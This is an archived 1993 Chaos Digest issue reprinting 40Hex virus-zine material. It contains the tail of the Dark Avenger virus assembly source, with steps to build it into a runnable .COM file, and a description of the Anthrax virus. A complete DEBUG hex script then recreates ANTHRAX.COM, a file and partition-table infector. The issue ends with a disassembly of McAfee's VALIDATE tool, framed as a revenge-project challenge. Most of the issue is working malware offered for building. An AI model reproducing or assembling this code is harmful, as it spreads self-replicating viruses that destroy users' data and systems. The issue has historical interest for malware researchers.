HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / pc / KAOS1_37.ZIP / KAOS1-37

Wrap

Text File | 1993-06-02 | 27.2 KB | 841 lines

Chaos Digest Mercredi 26 Mai 1993 Volume 1 : Numero 37 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.37 (26 Mai 1993) File 1--40H VMag Issue 1 Volume 3 #002(2)-004(1) (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Issue 1 Volume 3 #002(2)-004(1) (reprint) [suite du listing de _Dark Avenger_ de ChaosD #1.35:] ; Check if the file is properly infected see_sick: sub dx,startup-copyright sbb cx,0 mov ax,4200h int 21h add ax,offset top_file adc dx,0 cmp ax,word ptr [top_save+18h] jne see_fuck cmp dx,word ptr [top_save+1ah] jne see_fuck mov dx,offset top_save+1ch mov si,dx mov cx,offset my_size mov ah,3fh int 21h jc see_fuck cmp cx,ax jne see_fuck xor di,di next_byte: lodsb scasb jne see_fuck loop next_byte stop_fuck_2: ret see_fuck: xor cx,cx ;Seek to the end of file xor dx,dx mov ax,4202h int 21h cmp word ptr [top_save],5a4dh je fuck_exe add ax,offset aux_size+200h ;Watch out for too big .COM files adc dx,0 je fuck_it ret ;Pad .EXE files to paragraph boundary. This is absolutely unnecessary. fuck_exe: mov dx,word ptr [top_save+18h] neg dl and dx,0fh xor cx,cx mov ax,4201h int 21h mov word ptr [top_save+18h],ax mov word ptr [top_save+1ah],dx fuck_it: mov ax,5700h ;Get file's date int 21h pushf push cx push dx cmp word ptr [top_save],5a4dh je exe_file ;Very clever, isn't it? mov ax,100h jmp short set_adr exe_file: mov ax,word ptr [top_save+14h] mov dx,word ptr [top_save+16h] set_adr: mov di,offset call_adr stosw mov ax,dx stosw mov ax,word ptr [top_save+10h] stosw mov ax,word ptr [top_save+0eh] stosw mov si,offset top_save ;This offers the possibilities to movsb ;some nasty programs to restore movsw ;exactly the original length xor dx,dx ;of the .EXE files mov cx,offset top_file mov ah,40h int 21h ;Write the virus jc go_no_fuck ;(don't trace here) xor cx,ax jnz go_no_fuck mov dx,cx mov ax,4200h int 21h cmp word ptr [top_save],5a4dh je do_exe mov byte ptr [top_save],0e9h mov ax,word ptr [top_save+18h] add ax,startup-copyright-3 mov word ptr [top_save+1],ax mov cx,3 jmp short write_header go_no_fuck: jmp short no_fuck ;Construct the .EXE file's header do_exe: call mul_hdr not ax not dx inc ax jne calc_offs inc dx calc_offs: add ax,word ptr [top_save+18h] adc dx,word ptr [top_save+1ah] mov cx,10h div cx mov word ptr [top_save+14h],startup-copyright mov word ptr [top_save+16h],ax add ax,(offset top_file-offset copyright-1)/16+1 mov word ptr [top_save+0eh],ax mov word ptr [top_save+10h],100h add word ptr [top_save+18h],offset top_file adc word ptr [top_save+1ah],0 mov ax,word ptr [top_save+18h] and ax,1ffh mov word ptr [top_save+2],ax pushf mov ax,word ptr [top_save+19h] shr byte ptr [top_save+1bh],1 rcr ax,1 popf jz update_len inc ax update_len: mov word ptr [top_save+4],ax mov cx,18h write_header: mov dx,offset top_save mov ah,40h int 21h ;Write the file beginning no_fuck: pop dx pop cx popf jc stop_fuck mov ax,5701h ;Restore the original file date int 21h stop_fuck: ret ;The following is used by the INT 21h and INT 27h handlers in connection ;to the program hiding in memory from those who don't need to see it. ;The whole system is absurde and meaningless and it is also another source ;for program conflicts. alloc: push ds call get_chain mov byte ptr ds:[0],'M' pop ds ;Assures that the program is the first one in the processes, ;which have intercepted INT 21h (yet another source of conflicts). ontop: push ds push ax push bx push dx xor bx,bx mov ds,bx lds dx,ds:[21h*4] cmp dx,offset int_21 jne search_segment mov ax,ds mov bx,cs cmp ax,bx je test_complete ;Searches the segment of the sucker who has intercepted INT 21h, in ;order to find where it has stored the old values and to replace them. ;Nothing is done for INT 27h. xor bx,bx search_segment: mov ax,[bx] cmp ax,offset int_21 jne search_next mov ax,cs cmp ax,[bx+2] je got_him search_next: inc bx jne search_segment je return_control got_him: mov ax,word ptr cs:[save_int_21] mov [bx],ax mov ax,word ptr cs:[save_int_21+2] mov [bx+2],ax mov word ptr cs:[save_int_21],dx mov word ptr cs:[save_int_21+2],ds xor bx,bx ;Even if he has not saved them in the same segment, this won't help him. return_control: mov ds,bx mov ds:[21h*4],offset int_21 mov ds:[21h*4+2],cs test_complete: pop dx pop bx pop ax pop ds ret ;Fetch the segment of the last MCB get_chain: push ax push bx mov ah,62h call function mov ax,cs dec ax dec bx next_blk: mov ds,bx stc adc bx,ds:[3] cmp bx,ax jc next_blk pop bx pop ax ret ;Multiply by 16 mul_hdr: mov ax,word ptr [top_save+8] mul_16: mov dx,10h mul dx ret db 'This program was written in the city of Sofia ' db '(C) 1988-89 Dark Avenger',0 ;INT 13h handler. ;Calls the original vectors in BIOS, if it's a writing call int_13: cmp ah,3 jnz subfn_ok cmp dl,80h jnc hdisk db 0eah ;JMP XXXX:YYYY my_size: ;--- Up to here comparison disk: ; with the original is made dd 0 hdisk: db 0eah ;JMP XXXX:YYYY fdisk: dd 0 subfn_ok: db 0eah ;JMP XXXX:YYYY save_int_13: dd 0 call_adr: dd 100h stack_pointer: dd 0 ;The original value of SS:SP my_save: int 20h ;The original contents of the first nop ;3 bytes of the file top_file: ;--- Up to here the code is written filehndl equ $ ; in the files filename equ filehndl+2 ;Buffer for the name of the opened file save_int_27 equ filename+65 ;Original INT 27h vector save_int_21 equ save_int_27+4 ;Original INT 21h vector aux_size equ save_int_21+4 ;--- Up to here is moved into memory top_save equ save_int_21+4 ;Beginning of the buffer, which ;contains ; - The first 24 bytes read from file ; - File length (4 bytes) ; - The last bytes of the file ; (my_size bytes) top_bz equ top_save-copyright my_bz equ my_size-copyright code ends end ------------------------------------------------------------------------------ A few notes on assembling this virus. It's a little bit tricky assembling the Dark Avenger Virus. Use these steps below. I use Turbo Assembler 2.0, but I'm positve that MASM will work just as well. 1: TASM AVENGER.ASM 2: TLINK AVENGER.OBJ 3: EXE2BIN AVENGER AVENGER.COM Now make a 3 byte file named JUMP.TMP using DEBUG like this 4: DEBUG n jmp.tmp e 0100 E9 68 00 rcx 3 w q 5: Now do this COPY JMP.TMP + AVENGER.COM DAVENGER.COM There you have it.... HR +++++ 40Hex Issue 3 0003 Anthrax Well, this is turning out to be a tribute issue to the Dark Avenger. Here is another one of his better known viruses. This is a nice one cause it not only is a file infector, but it is also a sort of boot sector virus. It is also what I dubbed a reincarnation virus, meaning that even if you clean your system of it, it may still live, because it leaves a copy of itself on the last sector of the disk. The virus can be reincarnated by the V2100 virus, also bu The Dark Avenger. Well, Patti Hoffman (one of my favorite people on earth, not) wrote this virus up. Aliases: V Status: Rare [Not for long] Discovery: July, 1990 Symptoms: .COM & .EXE growth Origin: Bulgaria Isolated: Netherlands Eff Length: 1040 - 1279 Bytes Type Code: PRAKX-Parasitic Resident .COM, .EXE, & Partition Table Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+, IBM Scan 2.00+ Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+ General Comments: The Anthrax Virus was isolated in July 1990 in the Netherlands after it was uploaded onto several BBSes in a trojan anti-viral program, USCAN.ZIP. It is the second virus to be found in a copy of UScan during July 1990, the first virus being V2100. Anthrax is a memory resident generic infector of .COM and .EXE files, including COMMAND.COM. The first time a program infected with the Anthrax virus is executed on the system's hard disk, the virus will infect the hard disk's partition table. At this point, the virus is not memory resident. It will also write a copy of itself on the last few sectors of the system's hard disk. If data existed on those last few sectors of the hard disk, it will be destroyed. When the system is booted from the hard disk, the Anthrax virus will install itself memory resident. It will remain memory resident until the first program is executed. At that time, it will deinstall itself from being resident and infect one .COM or .EXE file. This virus does not infect files in the current directory first, but instead starts to infect files at the lowest level of the disk's directory tree. Later, when an infected program is executed, Anthrax will infect one .COM or .EXE file, searching the directory structure from the lowest level of the directory tree. If the executed infected program was located on the floppy drive, a .COM or .EXE file may or may not be infected. The Anthrax Virus's code is 1,024 bytes long, but infected programs will increase in length by 1,040 to 1,279 bytes. On the author's test system, the largest increase in length experienced was 1,232 bytes. Infected files will always have an infected file length that is a multiple of 16. The following text strings can be found in files infected with the Anthrax virus: "(c)Damage, Inc." "ANTHRAX" A third text string occurs in the viral code, but it is in Cyrillics. Per Vesselin Bontchev, this third string translates to: "Sofia 1990". Since Anthrax infects the hard disk partition tables, infected systems must have the partition table disinfected or rebuilt in order to remove the virus. This disinfection can be done with either a low- level format or use of the MDisk/P program for the correct DOS version after powering off and rebooting from a write-protected boot diskette for the system. Any .COM or .EXE files infected with Anthrax must also be disinfected or erased. Since a copy of the virus will exist on the last few sectors of the drive, these must also be located and overwritten. Anthrax interacts with another virus: V2100. If a system which was previously infected with Anthrax should become infected with the V2100 virus, the V2100 virus will check the last few sectors of the hard disk for the spare copy of Anthrax. If the spare copy is found, then Anthrax will be copied to the hard disk's partition table. It is not known if Anthrax carries any destructive capabilities or trigger/activation dates. Here is the actual virus. Well if this is your fist copy of 40Hex, let me explain how to compile it. First copy what is below with your editor. Then save it to a file called ANTHRAX.SCR. Then type at the command line - DEBUG <ANTHRAX.SCR This will create a file called ANTHRAX.COM, that's the actual virus. ---------------------------------------------------------------------------- n anthrax.com e 0100 E9 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0110 95 8C C8 2D 00 00 BA 00 00 50 52 1E 33 C9 8E D9 e 0120 BE 4C 00 B8 CD 00 8C CA 87 44 44 87 54 46 52 50 e 0130 C4 1C B4 13 CD 2F 06 53 B4 13 CD 2F 58 5A 87 04 e 0140 87 54 02 52 50 51 56 A0 3F 04 A8 0F 75 6C 0E 07 e 0150 BA 80 00 B1 03 BB 77 06 B8 01 02 50 CD 13 58 B1 e 0160 01 BB 00 04 CD 13 0E 1F BE 9B 03 8B FB B9 5E 00 e 0170 56 F3 A6 5E 8B FB B9 62 00 56 F3 A4 5F BE 12 08 e 0180 B9 65 00 F3 A4 74 1E 89 4D E9 B1 5C 89 4D 9B 88 e 0190 6D DC B1 02 33 DB B8 02 03 CD 13 49 BB 00 04 B8 e 01A0 01 03 CD 13 49 B4 19 CD 21 50 B2 02 B4 0E CD 21 e 01B0 B7 02 E8 87 01 5A B4 0E CD 21 5E 1F 8F 04 8F 44 e 01C0 02 8F 44 44 8F 44 46 1F 1E 07 95 CB 28 63 29 20 e 01D0 44 61 6D 61 67 65 2C 20 49 6E 63 2E 00 B0 03 CF e 01E0 06 1E 57 56 50 33 C0 8E D8 BE 86 00 0E 07 BF 08 e 01F0 06 FD AD AB A5 AF 87 F7 AD FC 74 11 1E 07 AF B8 e 0200 07 01 AB 8C C8 AB 8E D8 BF 68 00 A5 A5 58 5E 5F e 0210 1F 07 2E FF 2E 00 06 06 1E 57 56 52 51 53 50 0E e 0220 1F BE 06 06 33 C9 8E C1 BF 84 00 A5 A5 B4 52 CD e 0230 21 26 8B 47 FE 8E D8 BB 03 00 03 07 40 8E D8 81 e 0240 07 80 00 0E 07 B7 12 E8 F2 00 58 5B 59 5A 5E 5F e 0250 1F 07 2E FF 2E 06 06 C3 91 AE B4 A8 BF 20 31 39 e 0260 39 30 B8 00 3D CD 21 72 EE 93 B8 20 12 CD 2F 53 e 0270 26 8A 1D B8 16 12 CD 2F 5B BE 62 04 8B D6 B1 18 e 0280 B4 3F CD 21 33 C1 75 70 06 1F C6 45 02 02 33 D2 e 0290 EC 3C 10 72 FB 03 45 11 13 55 13 24 F0 3D 00 FB e 02A0 73 56 89 45 15 89 55 17 0E 1F 50 B1 10 F7 F1 2B e 02B0 44 08 8B C8 2B 44 16 A3 04 00 AD 35 4D 5A 74 03 e 02C0 35 17 17 9C 75 17 89 04 3B 44 0A 87 44 12 A3 07 e 02D0 00 89 4C 14 B9 DC 04 74 07 83 44 08 48 B9 65 00 e 02E0 51 B9 9B 03 B4 40 CD 21 33 C8 59 75 09 BA 00 04 e 02F0 B4 40 CD 21 33 C8 5A 58 75 38 26 89 4D 15 26 89 e 0300 4D 17 52 9D 75 18 26 8B 45 11 26 8B 55 13 B5 02 e 0310 F7 F1 85 D2 74 01 40 89 14 89 44 02 EB 0A C6 44 e 0320 FE E9 05 28 03 89 44 FF B9 18 00 8D 54 FE B4 40 e 0330 CD 21 26 80 4D 06 40 B4 3E CD 21 C3 8E D9 8A 1E e 0340 6C 04 0E 1F FF 06 5E 04 BA 4B 06 E8 1F 00 BE 0A e 0350 06 C6 04 5C 46 32 D2 B4 47 CD 21 BA 9B 03 B4 3B e 0360 CD 21 E3 0D B4 51 CD 21 8E DB BA 80 00 B4 1A EB e 0370 C8 72 3E BE 9C 03 32 D2 B4 47 CD 21 3A 2E DC 03 e 0380 B1 32 BA 9D 02 B4 4E 74 5C CD 21 72 24 BA 4B 06 e 0390 B8 01 4F BE DC 03 BF 68 06 AA B1 0D F3 A6 74 45 e 03A0 3A 6D FE 74 40 CD 21 73 E4 32 C0 EB D3 2A 2E 2A e 03B0 00 B1 41 BF 9C 03 3A 2D 8A C5 A2 DC 03 74 69 F2 e 03C0 AE 4F B1 41 B0 5C FD F2 AE 8D 75 02 BF DC 03 FC e 03D0 AC 84 C0 AA 75 FA BA CD 02 32 C9 EB 81 2E 2E 00 e 03E0 BA 4B 06 B4 4F CD 21 72 C8 BE 69 06 BF DC 03 80 e 03F0 3C 2E 74 EC 88 2D 8B D6 F6 44 F7 10 75 DB AC 84 e 0400 C0 AA 75 FA 4E FD AD AD FC 3D 58 45 74 05 3D 4F e 0410 4D 75 CD 53 E8 4B FE 5B 33 C9 8E C1 26 A0 6C 04 e 0420 0E 07 2A C3 3A C7 72 B8 BA 80 00 B1 03 BB 00 02 e 0430 B8 01 03 CD 13 BA 0A 06 E9 23 FF 95 BF 00 01 8B e 0440 5D 01 81 EB 28 02 8B C7 8D B7 FD 03 A5 A4 93 B1 e 0450 04 D3 E8 8C D9 03 C1 BA 0B 00 EB 71 B8 D0 00 FC e 0460 87 85 68 FA AB 8C C8 E2 F7 A3 86 00 AB 8E D8 B4 e 0470 08 CD 13 49 49 A1 E9 03 84 E4 74 01 91 B2 80 B8 e 0480 03 03 CD 13 91 84 E4 75 02 2C 40 FE CC A3 E9 03 e 0490 FF 06 60 04 32 F6 B9 01 00 BB 00 04 B8 01 03 CD e 04A0 13 8A D6 CB 41 4E 54 48 52 41 58 0E 1F 83 2E 13 e 04B0 04 02 CD 12 B1 06 D3 E0 8E C0 BF 00 04 BE 00 7C e 04C0 B9 00 01 8B DE FC F3 A5 8E D8 BA 27 04 51 53 50 e 04D0 52 CB 8E C1 B1 04 BE B0 05 83 C6 0E AD 3C 80 74 e 04E0 04 E2 F6 CD 18 92 FD AD 91 B8 01 02 CD 13 81 3E e 04F0 FE 05 55 AA 75 ED 06 1E 07 1F 32 F6 B9 02 00 33 e 0500 DB B8 02 02 CD 13 E9 EE FE 00 00 00 00 CD 20 CC e 0510 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A e 0520 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A e 0530 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A e 0540 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A e 0550 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A e 0560 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A e 0570 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A rcx 480 w q ------------------------------------------------------------------------ HR +++++ 40Hex Issue 3 0004 The Strange Case of Validate - Fall to your knees, begging your way out of this disease. Well we all know what a dick John Mcafee is. Well with his product SCAN comes a program VALIDATE. I noticed when I took a close look at the internal workings of this program (while working on a little revenge project) that there is text in the program. The strings read "Enter password now" "Access denied" Well this got me going, what is this??? Well this brings up our first 40Hex challenge. I am including a dissassembly of validate. Here it is: ---------------------------------------------------------------------------- data_1e equ 100h data_2e equ 102h data_3e equ 2Ch data_4e equ 14h data_5e equ 16h data_6e equ 18h data_7e equ 1Ah data_8e equ 47h data_9e equ 49h data_10e equ 4Ah data_11e equ 59h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h validate proc far start: jmp loc_96 db 0Dh, ' ', 0Dh, 0Ah, 'VALIDATE 0' db '.3 ' copyright db 'Copyright 1988-89 by McAfee Asso' db 'ciates.' db ' (408) 988-3832', 0Dh, 0Ah, 0Dh db 0Ah, 'Written by Dennis Yelle', 0Dh db 0Ah, 0Dh, 0Ah db 1Ah data_19 db 30h dexed access) db '123456789ABCDEF' db 10h, 0Fh, 0Dh, 8, 6, 3 db 1, 0, 0C8h, 10h, 0Ch, 5 db 0, 0C8h, 10h, 0Fh, 2, 0 db 0C8h, 10h, 0Fh, 0Eh, 7, 6 db 0, 0C8h, 10h, 0Fh, 0Dh, 0 db 0C8h loc_1: mov al,1 mov ah,4Ch int 21h db 0CDh, 20h loc_2: jmp short loc_2 validate endp sub_1 proc near mov dx,si loc_3: lodsb cmp al,1 ja loc_3 pushf mov cx,si sub cx,dx dec cx mov ah,40h mov bx,1 int 21h popf jz loc_1 retn sub_1 endp sub_2 proc near mov bp,sp xchg si,[bp] call sub_1 xchg si,[bp] retn sub_2 endp db 0B4h, 40h, 0BBh, 2, 0, 0B9h db 48h, 0, 0BAh, 9, 1, 0CDh db 21h, 0A1h, 2, 0, 8Ch, 0CBh db 29h, 0D8h, 3Dh, 0, 10h, 77h db 52h, 0E8h, 0D8h, 0FFh db 0Dh, 0Ah, ' Sorry, there is not e' db 'nough memory available.', 0Dh, 0Ah db ' I need 66000 bytes of RAM.', 0Dh db 0Ah db 1, 0BEh, 80h, 0, 0ACh, 0Ah db 0C0h db 74h, 9 loc_4: lodsb cmp al,20h je loc_4 cmp al,0Dh jne loc_6 loc_5: jmp loc_10 loc_6: dec si mov data_33,si push si mov si,197h call sub_9 mov di,666h call sub_10 mov si,186h call sub_9 mov di,866h call sub_10 call sub_2 and [bx+si],ah and [bx+si],ah and [bx+si],ah and [bx+si],ah and [bx+si],ah inc si db 'ile Name: ' db 0, 5Eh loc_7: lodsb cmp al,20h jg loc_7 push ax xor al,al mov [si-1],al mov bx,1 mov cx,si dec cx mov dx,data_33 sub cx,dx mov ah,40h int 21h push si call sub_8 mov dx,data_33 mov ax,3D00h int 21h jc loc_11 mov data_32,ax ;* call sub_3 db 0E8h, 0B8h, 0 mov ah,3Eh mov bx,data_32 int 21h pop si pop ax cmp al,0Dh je loc_9 loc_8: lodsb cmp al,20h je loc_8 cmp al,0Dh je loc_9 call sub_8 jmp loc_6 loc_9: mov ax,4C00h int 21h loc_10: mov dx,2E6h mov cx,84h jmp loc_17 loc_11: mov dx,5FBh mov cx,29h jmp loc_17 db 'This program prints the validati' db 'on information for a file.', 0Dh db 0Ah, 'Examples:', 0Dh, 0Ah, ' ' db ' VALIDATE SCAN.EXE', 0Dh, 0Ah db ' VALIDATE SCANRES.EXE', 0Dh db 0Ah sub_3 proc near xor ax,ax mov data_34,ax mov data_35,ax loc_12: mov bx,data_32 mov dx,0A66h mov cx,8000h mov ah,3Fh int 21h jnc loc_13 jmp loc_16 loc_13: or ax,ax jz loc_14 mov dx,ax push dx mov si,0A66h mov di,666h mov cx,data_34 call sub_11 mov data_34,cx pop dx mov si,0A66h mov di,866h mov cx,data_35 call sub_11 mov data_35,cx jmp short loc_12 loc_14: call sub_2 and [bx+si],ah and [bx+si],ah and [bx+si],ah and [bx+si],ah and [bx+si],ah and [bx+si],ah and [bx+si],ah and [bp+di+69h],dl jp $+67h cmp ah,[bx+si] and [bx+si],al mov ax,4202h mov bx,data_32 xor cx,cx xor dx,dx int 21h jnc $+0Fh call sub_2 jnz $+70h db 6Bh, 6Eh, 6Fh, 77h, 6Eh, 0 db 0EBh, 3, 0E8h, 59h, 1, 0E8h db 0D1h, 0FDh db 0Dh, 0Ah, ' Date: ' db 0, 0B8h, 0, 57h, 8Bh, 1Eh db 4Eh, 6, 0CDh, 21h, 73h, 8 db 0BEh, 0DDh, 3, 0E8h, 8Fh, 0FDh db 0EBh, 26h, 52h, 8Bh, 0C2h, 0B1h db 5, 0D3h, 0E8h, 25h, 0Fh, 0 db 0E8h, 70h, 1, 0E8h, 98h, 0 db 58h, 50h, 25h, 1Fh, 0, 0E8h db 65h, 1, 0E8h, 8Dh, 0, 58h db 0B1h, 9, 0D3h, 0E8h, 5, 0BCh db 7, 0E8h, 57h, 1, 0E8h, 7Ch db 0FDh db 0Dh, 0Ah, 'File Authentication:', 0Dh db 0Ah, ' Check Method 1 - ' db 0, 8Bh, 0Eh, 52h, 6, 0E8h db 27h, 0, 0E8h, 43h, 0FDh db 0Dh, 0Ah, ' Check Method 2 - ' db 0, 8Bh, 0Eh, 54h, 6, 0E8h db 4, 0, 0E8h, 27h, 0, 0C3h db 51h, 89h, 0C8h, 88h, 0E0h, 0E8h db 1, 0 db 58h ------------------------------ End of Chaos Digest #1.37 ************************************